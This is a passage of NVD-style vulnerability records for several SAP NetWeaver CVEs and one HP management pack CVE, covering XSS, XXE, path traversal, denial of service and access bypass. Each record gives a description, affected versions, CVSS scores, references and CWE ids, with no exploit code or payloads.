Due to insufficient encoding of user input, SAP NetWeaver - versions 700, 701, 702, 731, 740, 750, allows an unauthenticated attacker to inject code that may expose sensitive data like user ID and password, which could lead to reflected Cross-Site scripting. These endpoints are normally exposed over the network and successful exploitation can partially impact confidentiality of the application.
References
Impacted products
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:sap:netweaver:700:*:*:*:*:*:*:*",
"matchCriteriaId": "A7FED49E-6F9A-494A-9226-1059249960A0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:701:*:*:*:*:*:*:*",
"matchCriteriaId": "4836C36D-242F-4818-81B4-C170959D02F5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:702:*:*:*:*:*:*:*",
"matchCriteriaId": "6A503ABF-8655-40D7-96AD-2D7F19A673AE",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:731:*:*:*:*:*:*:*",
"matchCriteriaId": "8A9D5C5A-6963-438B-B0EA-2A621A34D8A9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:740:*:*:*:*:*:*:*",
"matchCriteriaId": "BFFA1591-0304-4FAE-A6A7-72D04D1F41A3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:750:*:*:*:*:*:*:*",
"matchCriteriaId": "7940A9AF-308E-4CE5-BA19-7A3DCF49F644",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Due to insufficient encoding of user input, SAP NetWeaver - versions 700, 701, 702, 731, 740, 750, allows an unauthenticated attacker to inject code that may expose sensitive data like user ID and password, which could lead to reflected Cross-Site scripting. These endpoints are normally exposed over the network and successful exploitation can partially impact confidentiality of the application.\n\n"
}
],
"id": "CVE-2023-0021",
"lastModified": "2024-11-21T07:36:24.610",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"source": "cna@sap.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2023-03-14T05:15:28.367",
"references": [
{
"source": "cna@sap.com",
"tags": [
"Permissions Required"
],
"url": "https://launchpad.support.sap.com/#/notes/3274920"
},
{
"source": "cna@sap.com",
"tags": [
"Vendor Advisory"
],
"url": "https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Permissions Required"
],
"url": "https://launchpad.support.sap.com/#/notes/3274920"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html"
}
],
"sourceIdentifier": "cna@sap.com",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-79"
}
],
"source": "cna@sap.com",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2013-10-24 00:55
Modified
2024-11-21 01:58
Severity ?
Summary
The Live Update webdynpro application (webdynpro/dispatcher/sap.com/tc~slm~ui_lup/LUP) in SAP NetWeaver 7.31 and earlier allows remote attackers to read arbitrary files and directories via an XML document containing an external entity declaration in conjunction with an entity reference, related to an XML External Entity (XXE) issue.
References
Impacted products
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:sap:netweaver:*:*:*:*:*:*:*:*",
"matchCriteriaId": "8AAB3DAC-021F-4C9E-B46E-BD656C1AB629",
"versionEndIncluding": "7.31",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:4.0:*:*:*:*:*:*:*",
"matchCriteriaId": "F59EAE32-F443-490E-9213-596430E406E7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:6.4:*:*:*:*:*:*:*",
"matchCriteriaId": "A35F93E3-FC19-4A52-885A-AA2112CAF34D",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:7.0:*:*:*:*:*:*:*",
"matchCriteriaId": "41FAC5DD-D577-47F9-B0CA-006032256642",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:7.01:*:*:*:*:*:*:*",
"matchCriteriaId": "2794A7DB-D5B8-467E-93F4-D65245FF187D",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:7.02:*:*:*:*:*:*:*",
"matchCriteriaId": "A9805246-77E5-456C-B7CF-07CFF2F9F069",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:7.03:*:*:*:*:*:*:*",
"matchCriteriaId": "369D0212-65DA-4121-981B-1F07B7465F97",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:7.10:*:*:*:*:*:*:*",
"matchCriteriaId": "EDFFDB95-B956-4B22-81F4-A4074D49D4A8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:7.30:*:*:*:*:*:*:*",
"matchCriteriaId": "606EFE4F-57A4-44E2-A98D-F0867A658218",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "The Live Update webdynpro application (webdynpro/dispatcher/sap.com/tc~slm~ui_lup/LUP) in SAP NetWeaver 7.31 and earlier allows remote attackers to read arbitrary files and directories via an XML document containing an external entity declaration in conjunction with an entity reference, related to an XML External Entity (XXE) issue."
},
{
"lang": "es",
"value": "La aplicacione Live Update WebDynpro (WebDynpro / distribuidor / sap.com / tc ~ slm ~ ui_lup / LUP) en SAP NetWeaver 7.31 y anteriores permite a atacantes remotos leer archivos arbitrarios y directorios a trav\u00e9s de un documento XML que contiene una declaraci\u00f3n de entidad externa en combinaci\u00f3n con un referencia de la entidad, en relaci\u00f3n con una cuesti\u00f3n entidad externa XML (XXE).\n"
}
],
"id": "CVE-2013-6244",
"lastModified": "2024-11-21T01:58:55.037",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
]
},
"published": "2013-10-24T00:55:02.570",
"references": [
{
"source": "cve@mitre.org",
"url": "http://en.securitylab.ru/lab/PT-2013-13"
},
{
"source": "cve@mitre.org",
"url": "http://osvdb.org/98892"
},
{
"source": "cve@mitre.org",
"url": "http://scn.sap.com/docs/DOC-8218"
},
{
"source": "cve@mitre.org",
"tags": [
"Vendor Advisory"
],
"url": "http://secunia.com/advisories/55302"
},
{
"source": "cve@mitre.org",
"url": "http://www.securityfocus.com/bid/63302"
},
{
"source": "cve@mitre.org",
"url": "https://service.sap.com/sap/support/notes/1820894"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://en.securitylab.ru/lab/PT-2013-13"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://osvdb.org/98892"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://scn.sap.com/docs/DOC-8218"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "http://secunia.com/advisories/55302"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.securityfocus.com/bid/63302"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://service.sap.com/sap/support/notes/1820894"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "NVD-CWE-noinfo"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2012-05-15 04:21
Modified
2024-11-21 01:39
Severity ?
Summary
The DiagTraceStreamI function in disp+work.exe 7010.29.15.58313 and 7200.70.18.23869 in the Dispatcher in SAP NetWeaver 7.0 EHP1 and EHP2 allows remote attackers to cause a denial of service (daemon crash) via a crafted SAP Diag packet.
References
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:sap:netweaver:7.0:ehp1:*:*:*:*:*:*",
"matchCriteriaId": "9FC1767F-10BD-468B-8D2B-538C82EB69B2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:7.0:ehp2:*:*:*:*:*:*",
"matchCriteriaId": "D04DC424-129B-448D-994B-7AC5D9B64703",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "The DiagTraceStreamI function in disp+work.exe 7010.29.15.58313 and 7200.70.18.23869 in the Dispatcher in SAP NetWeaver 7.0 EHP1 and EHP2 allows remote attackers to cause a denial of service (daemon crash) via a crafted SAP Diag packet."
},
{
"lang": "es",
"value": "La funci\u00f3n DiagTraceStreamI en disp+work.exe v7010.29.15.58313 y v7200.70.18.23869 en el Dispatcher en SAP NetWeaver v7.0 EHP1 EHP2 permite a atacantes remotos causar una denegaci\u00f3n de servicio (ca\u00edda del servicio) mediante un paquete SAP Diag manipulado."
}
],
"id": "CVE-2012-2512",
"lastModified": "2024-11-21T01:39:09.817",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
]
},
"published": "2012-05-15T04:21:43.407",
"references": [
{
"source": "cve@mitre.org",
"url": "http://scn.sap.com/docs/DOC-8218"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit"
],
"url": "http://www.coresecurity.com/content/sap-netweaver-dispatcher-multiple-vulnerabilities"
},
{
"source": "cve@mitre.org",
"url": "http://www.securitytracker.com/id?1027052"
},
{
"source": "cve@mitre.org",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/75454"
},
{
"source": "cve@mitre.org",
"url": "https://service.sap.com/sap/support/notes/1687910"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://scn.sap.com/docs/DOC-8218"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit"
],
"url": "http://www.coresecurity.com/content/sap-netweaver-dispatcher-multiple-vulnerabilities"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.securitytracker.com/id?1027052"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/75454"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://service.sap.com/sap/support/notes/1687910"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-119"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2023-04-11 04:16
Modified
2024-11-21 07:56
Severity ?
8.7 (High) - CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:H/A:H
6.5 (Medium) - CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H
6.5 (Medium) - CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H
Summary
In SAP NetWeaver (BI CONT ADDON) - versions 707, 737, 747, 757, an attacker can exploit a directory traversal flaw in a report to upload and overwrite files on the SAP server. Data cannot be read but if a remote attacker has sufficient (administrative) privileges then potentially critical OS files can be overwritten making the system unavailable.
References
Impacted products
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:sap:netweaver:707:*:*:*:*:*:*:*",
"matchCriteriaId": "1B2D78B8-88C3-424E-A0D6-32ABD6748E9F",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:737:*:*:*:*:*:*:*",
"matchCriteriaId": "E4997817-2FC9-4256-A892-CAA64DC58E57",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:747:*:*:*:*:*:*:*",
"matchCriteriaId": "780CB238-BD3C-4DEE-AFC6-DC403C8C3AFA",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:757:*:*:*:*:*:*:*",
"matchCriteriaId": "8FEBCDDF-4828-45D1-A81D-FFB50261DBCA",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "In SAP NetWeaver (BI CONT ADDON) - versions 707, 737, 747, 757, an attacker can exploit a directory traversal flaw in a report to\u00a0upload and overwrite files on the SAP server. Data cannot be read but if a remote attacker has sufficient (administrative) privileges then potentially critical OS files can be overwritten making the system unavailable.\n\n"
}
],
"id": "CVE-2023-29186",
"lastModified": "2024-11-21T07:56:40.720",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.7,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.3,
"impactScore": 5.8,
"source": "cna@sap.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.2,
"impactScore": 5.2,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2023-04-11T04:16:08.610",
"references": [
{
"source": "cna@sap.com",
"tags": [
"Permissions Required"
],
"url": "https://launchpad.support.sap.com/#/notes/3305907"
},
{
"source": "cna@sap.com",
"tags": [
"Vendor Advisory"
],
"url": "https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Permissions Required"
],
"url": "https://launchpad.support.sap.com/#/notes/3305907"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html"
}
],
"sourceIdentifier": "cna@sap.com",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-22"
}
],
"source": "cna@sap.com",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2013-11-20 14:12
Modified
2024-11-21 01:59
Severity ?
Summary
GRMGApp in SAP NetWeaver allows remote attackers to bypass intended access restrictions via unspecified vectors.
References
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:sap:netweaver:-:*:*:*:*:*:*:*",
"matchCriteriaId": "CB7AAA9B-5209-4419-87DA-8130843AD2AF",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "GRMGApp in SAP NetWeaver allows remote attackers to bypass intended access restrictions via unspecified vectors."
},
{
"lang": "es",
"value": "GRMGApp en SAP NetWeaver permite a atacantes remotos evadir restricciones de acceso intencionadas a trav\u00e9s de vectores sin especificar."
}
],
"id": "CVE-2013-6823",
"lastModified": "2024-11-21T01:59:46.720",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 6.4,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 10.0,
"impactScore": 4.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
]
},
"published": "2013-11-20T14:12:31.037",
"references": [
{
"source": "cve@mitre.org",
"url": "http://scn.sap.com/docs/DOC-8218"
},
{
"source": "cve@mitre.org",
"url": "https://erpscan.io/advisories/dsecrg-13-002-sap-grmgapp-xxe-and-authentication-bypass/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://scn.sap.com/docs/DOC-8218"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://erpscan.io/advisories/dsecrg-13-002-sap-grmgapp-xxe-and-authentication-bypass/"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-264"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2016-02-16 15:59
Modified
2024-11-21 02:48
Severity ?
Summary
Multiple cross-site scripting (XSS) vulnerabilities in the Java Proxy Runtime ProxyServer servlet in SAP NetWeaver 7.4 allow remote attackers to inject arbitrary web script or HTML via the (1) ns or (2) interface parameter to ProxyServer/register, aka SAP Security Note 2220571.
References
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:sap:netweaver:7.40:*:*:*:*:*:*:*",
"matchCriteriaId": "F019F7F5-7740-4BD4-850F-D7A1923C6200",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Multiple cross-site scripting (XSS) vulnerabilities in the Java Proxy Runtime ProxyServer servlet in SAP NetWeaver 7.4 allow remote attackers to inject arbitrary web script or HTML via the (1) ns or (2) interface parameter to ProxyServer/register, aka SAP Security Note 2220571."
},
{
"lang": "es",
"value": "M\u00faltiples vulnerabilidades de XSS en el Java Proxy Runtime ProxyServer servlet en SAP NetWeaver 7.5 permite a atacantes remotos inyectar secuencias de comandos de web o HTML arbitrarios a trav\u00e9s de (1) ns o (2) par\u00e1metro de interfaz para ProxyServer/register, tambi\u00e9n conocido como SAP Security Note 2220571."
}
],
"id": "CVE-2016-2387",
"lastModified": "2024-11-21T02:48:21.987",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2016-02-16T15:59:01.117",
"references": [
{
"source": "cve@mitre.org",
"url": "http://packetstormsecurity.com/files/137045/SAP-NetWeaver-AS-JAVA-7.4-Cross-Site-Scripting.html"
},
{
"source": "cve@mitre.org",
"url": "http://seclists.org/fulldisclosure/2016/May/39"
},
{
"source": "cve@mitre.org",
"url": "https://erpscan.io/advisories/erpscan-16-008-sap-netweaver-7-4-proxyserver-servlet-xss-vulnerability/"
},
{
"source": "cve@mitre.org",
"url": "https://erpscan.io/press-center/blog/sap-security-notes-february-2016-review/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://packetstormsecurity.com/files/137045/SAP-NetWeaver-AS-JAVA-7.4-Cross-Site-Scripting.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://seclists.org/fulldisclosure/2016/May/39"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://erpscan.io/advisories/erpscan-16-008-sap-netweaver-7-4-proxyserver-servlet-xss-vulnerability/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://erpscan.io/press-center/blog/sap-security-notes-february-2016-review/"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-79"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2015-03-14 01:59
Modified
2024-11-21 02:26
Severity ?
Summary
HP Operations Manager i Management Pack 1.x before 1.01 for SAP allows local users to execute OS commands by leveraging SAP administrative privileges.
References
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| hp | operations_manager_i_management_pack | 1.0 | |
| sap | netweaver | - |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:hp:operations_manager_i_management_pack:1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "1F302840-34FC-4AEE-970E-6285FBEB2049",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:sap:netweaver:-:*:*:*:*:*:*:*",
"matchCriteriaId": "CB7AAA9B-5209-4419-87DA-8130843AD2AF",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "HP Operations Manager i Management Pack 1.x before 1.01 for SAP allows local users to execute OS commands by leveraging SAP administrative privileges."
},
{
"lang": "es",
"value": "HP Operations Manager i Management Pack 1.x anterior a 1.01 para SAP permite a usuarios locales ejecutar comandos de Sistema Operativo aprovechando privilegios de administraci\u00f3n SAP"
}
],
"id": "CVE-2015-2107",
"lastModified": "2024-11-21T02:26:48.587",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "SINGLE",
"availabilityImpact": "COMPLETE",
"baseScore": 6.8,
"confidentialityImpact": "COMPLETE",
"integrityImpact": "COMPLETE",
"vectorString": "AV:L/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
},
"exploitabilityScore": 3.1,
"impactScore": 10.0,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
]
},
"published": "2015-03-14T01:59:15.533",
"references": [
{
"source": "hp-security-alert@hp.com",
"tags": [
"Vendor Advisory"
],
"url": "http://h20564.www2.hp.com/hpsc/doc/public/display?docId=emr_na-c04588084"
},
{
"source": "hp-security-alert@hp.com",
"tags": [
"Vendor Advisory"
],
"url": "http://h20564.www2.hp.com/hpsc/doc/public/display?docId=emr_na-c04588084"
},
{
"source": "hp-security-alert@hp.com",
"url": "http://www.securitytracker.com/id/1031870"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "http://h20564.www2.hp.com/hpsc/doc/public/display?docId=emr_na-c04588084"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "http://h20564.www2.hp.com/hpsc/doc/public/display?docId=emr_na-c04588084"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.securitytracker.com/id/1031870"
}
],
"sourceIdentifier": "hp-security-alert@hp.com",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-284"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2009-08-21 20:30
Modified
2024-11-21 01:06
Severity ?
Summary
Cross-site scripting (XSS) vulnerability in uddiclient/process in the UDDI client in SAP NetWeaver Application Server (Java) 7.0 allows remote attackers to inject arbitrary web script or HTML via the TModel Key field.
References
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:sap:netweaver:7.0:*:*:*:*:*:*:*",
"matchCriteriaId": "41FAC5DD-D577-47F9-B0CA-006032256642",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Cross-site scripting (XSS) vulnerability in uddiclient/process in the UDDI client in SAP NetWeaver Application Server (Java) 7.0 allows remote attackers to inject arbitrary web script or HTML via the TModel Key field."
},
{
"lang": "es",
"value": "Vulnerabilidad de secuencias de comandos en sitios cruzados (XSS) en uddiclient/process en el cliente UDDI en SAP NetWeaver Application Server (Java) 7.0 permite a atacantes remotos inyectar secuencias de comandos web o HTML de su elecci\u00f3n mediante el campo TModel Key."
}
],
"id": "CVE-2009-2932",
"lastModified": "2024-11-21T01:06:05.630",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
]
},
"published": "2009-08-21T20:30:00.407",
"references": [
{
"source": "cve@mitre.org",
"url": "http://osvdb.org/57000"
},
{
"source": "cve@mitre.org",
"tags": [
"Vendor Advisory"
],
"url": "http://secunia.com/advisories/36228"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit"
],
"url": "http://www.dsecrg.com/pages/vul/show.php?id=133"
},
{
"source": "cve@mitre.org",
"url": "http://www.securityfocus.com/archive/1/505697/100/0/threaded"
},
{
"source": "cve@mitre.org",
"url": "http://www.securityfocus.com/bid/36034"
},
{
"source": "cve@mitre.org",
"url": "http://www.securitytracker.com/id?1022731"
},
{
"source": "cve@mitre.org",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/52429"
},
{
"source": "cve@mitre.org",
"url": "https://service.sap.com/sap/support/notes/1322098"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://osvdb.org/57000"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "http://secunia.com/advisories/36228"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit"
],
"url": "http://www.dsecrg.com/pages/vul/show.php?id=133"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.securityfocus.com/archive/1/505697/100/0/threaded"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.securityfocus.com/bid/36034"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.securitytracker.com/id?1022731"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/52429"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://service.sap.com/sap/support/notes/1322098"
}
],
"sourceIdentifier": "cve@mitre.org",
